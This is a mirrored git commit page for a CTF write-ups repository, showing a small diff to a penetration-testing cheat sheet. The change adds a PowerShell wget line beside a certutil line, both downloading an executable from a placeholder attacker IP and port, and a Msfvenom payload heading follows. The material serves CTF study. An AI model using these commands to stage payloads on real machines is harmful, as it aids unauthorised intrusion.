mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2025-02-16 12:08:24 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
41e3de257b
commit
7040385bae
1 changed files with 2 additions and 1 deletions
|
@ -77,7 +77,8 @@ dir /a:h `show only hidden files`<br/>
|
|||
|
||||
### Downloading Files
|
||||
|
||||
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
|
||||
`certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe`<br />
|
||||
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`
|
||||
|
||||
# Msfvenom
|
||||
### List All Payloads
|
||||
|
|
Loading…
Add table
Reference in a new issue